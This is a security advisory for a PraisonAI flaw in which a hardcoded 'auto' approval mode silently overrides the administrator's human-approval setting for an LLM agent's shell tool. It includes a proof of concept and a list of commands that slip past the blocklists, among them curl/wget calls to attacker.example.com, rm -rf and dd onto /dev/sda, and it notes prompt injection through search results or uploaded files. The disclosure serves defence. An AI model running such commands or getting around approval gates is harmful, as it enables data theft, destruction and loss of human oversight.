Summary
The Chainlit UI modules (chat.py and code.py) hardcode config.approval_mode = "auto" after loading administrator configuration from the PRAISON_APPROVAL_MODE environment variable, silently overriding any "manual" or "scoped" approval setting. This defeats the human-in-the-loop approval gate for all ACP tool executions, including shell command execution via subprocess.run(..., shell=True). An authenticated user can instruct the LLM agent to execute arbitrary single-command shell operations on the server without any approval prompt.
Details
The application has a well-designed approval framework supporting auto, manual, and scoped modes, configured via the PRAISON_APPROVAL_MODE environment variable and loaded by ToolConfig.from_env() at interactive_tools.py:81-106.
However, both UI modules unconditionally override this after loading:
chat.py:156-159:
config = ToolConfig.from_env() # reads PRAISON_APPROVAL_MODE=manual
config.workspace = os.getcwd()
config.approval_mode = "auto" # hardcoded override, ignoring admin config
code.py:155-158:
config = ToolConfig.from_env()
config.workspace = os.environ.get("PRAISONAI_CODE_REPO_PATH", os.getcwd())
config.approval_mode = "auto" # same hardcoded override
This flows to agent_tools.py:347-348 in the acp_execute_command function:
auto_approve = runtime.config.approval_mode == "auto" # always True
approved = await orchestrator.approve_plan(plan, auto=auto_approve)
The plan is auto-approved without user confirmation and reaches action_orchestrator.py:458:
result = subprocess.run(
step.target,
shell=True, # shell execution
capture_output=True,
text=True,
cwd=str(workspace),
timeout=30
)
Command sanitization is insufficient. Two blocklists exist:
_sanitize_command()atagent_tools.py:60-86blocks:$(,`,&&,||,>>,>,|,;,&,\n,\r_apply_step()ataction_orchestrator.py:449blocks:;,&,|,$,`
Both only target command chaining/substitution operators. Single-argument destructive commands pass both blocklists: rm -rf /home, curl http://attacker.example.com/exfil, wget, chmod 777 /etc/shadow, python3 -c "import os; os.unlink('/important')", dd if=/dev/zero of=/dev/sda.
PoC
Prerequisites: PraisonAI UI running (praisonai ui chat or praisonai ui code). Default credentials not changed.
# Step 1: Start the Chainlit UI
praisonai ui chat
# Step 2: Log in with default credentials at http://localhost:8000
# Username: admin
# Password: admin
# Step 3: Send a chat message requesting command execution:
# "Please run this command for me: cat /etc/passwd"
# The LLM agent calls acp_execute_command("cat /etc/passwd")
# _sanitize_command passes (no blocked patterns)
# approval_mode="auto" → auto-approved at agent_tools.py:347-348
# subprocess.run("cat /etc/passwd", shell=True) executes at action_orchestrator.py:458
# Contents of /etc/passwd returned in chat
# Step 4: Demonstrate the override of admin configuration:
# Even with PRAISON_APPROVAL_MODE=manual set in the environment,
# chat.py:159 overwrites it to "auto"
export PRAISON_APPROVAL_MODE=manual
praisonai ui chat
# Commands still auto-approve because of the hardcoded override
Commands that bypass sanitization blocklists:
rm -rf /home/user/documents, no blocked characterschmod 777 /etc/shadow, no blocked characterscurl http://attacker.example.com/exfil, no blocked characterswget http://attacker.example.com/backdoor -O /tmp/backdoor, no blocked characterspython3 -c "__import__('os').unlink('/important/file')", no blocked characters
Impact
- Arbitrary command execution: An authenticated user (or attacker with default
admin/admincredentials) can execute any single shell command on the server hosting PraisonAI, subject only to the OS-level permissions of the PraisonAI process. - Confidentiality breach: Read arbitrary files accessible to the process (
/etc/passwd, application secrets, environment variables containing API keys). - Integrity compromise: Modify or delete files, install backdoors, tamper with application code.
- Availability impact: Kill processes, consume disk/memory, delete critical data.
- Administrator control undermined: Even administrators who explicitly set
PRAISON_APPROVAL_MODE=manualto require human approval have their configuration silently overridden, creating a false sense of security. - Prompt injection vector: Since the agent also processes external content (web search results via Tavily, uploaded files), malicious content could trigger command execution through the auto-approved tool without direct user intent.
The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions. Typical impact: unauthorized data access or execution of privileged operations.
GHSA-QWGJ-RRPJ-75XM has a CVSS score of 8.8 (High). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (4.5.128); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Remove the hardcoded override and respect the administrator's configured approval mode. In both chat.py and code.py:
# Before (chat.py:156-159):
config = ToolConfig.from_env()
config.workspace = os.getcwd()
config.approval_mode = "auto" # Trust mode - auto-approve all tool executions
# After:
config = ToolConfig.from_env()
config.workspace = os.getcwd()
# Respect PRAISON_APPROVAL_MODE from environment; defaults to "auto" in ToolConfig
# Administrators can set PRAISON_APPROVAL_MODE=manual for human-in-the-loop approval
Additionally, strengthen _sanitize_command() to use an allowlist approach rather than a blocklist:
import shlex
ALLOWED_COMMANDS = {"ls", "cat", "head", "tail", "grep", "find", "echo", "pwd", "wc", "sort", "uniq", "diff", "git", "python", "pip", "node", "npm"}
def _sanitize_command(command: str) -> str:
# Existing blocklist checks...
# Additionally, check the base command against allowlist
try:
parts = shlex.split(command)
except ValueError:
raise ValueError(f"Could not parse command: {command!r}")
base_cmd = os.path.basename(parts[0]) if parts else ""
if base_cmd not in ALLOWED_COMMANDS:
raise ValueError(
f"Command {base_cmd!r} is not in the allowed command list. "
f"Allowed: {', '.join(sorted(ALLOWED_COMMANDS))}"
)
return command
Frequently Asked Questions
- What is GHSA-QWGJ-RRPJ-75XM? GHSA-QWGJ-RRPJ-75XM is a high-severity incorrect authorization vulnerability in PraisonAI (pip), affecting versions < 4.5.128. It is fixed in 4.5.128. The application does not correctly enforce access controls, allowing a principal to access resources or operations beyond their granted permissions.
- How severe is GHSA-QWGJ-RRPJ-75XM? GHSA-QWGJ-RRPJ-75XM has a CVSS score of 8.8 (High). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of PraisonAI are affected by GHSA-QWGJ-RRPJ-75XM? PraisonAI (pip) versions < 4.5.128 is affected.
- Is there a fix for GHSA-QWGJ-RRPJ-75XM? Yes. GHSA-QWGJ-RRPJ-75XM is fixed in 4.5.128. Upgrade to this version or later.
- Is GHSA-QWGJ-RRPJ-75XM exploitable, and should I be worried? Whether GHSA-QWGJ-RRPJ-75XM is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether GHSA-QWGJ-RRPJ-75XM is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix GHSA-QWGJ-RRPJ-75XM? Upgrade
PraisonAIto 4.5.128 or later.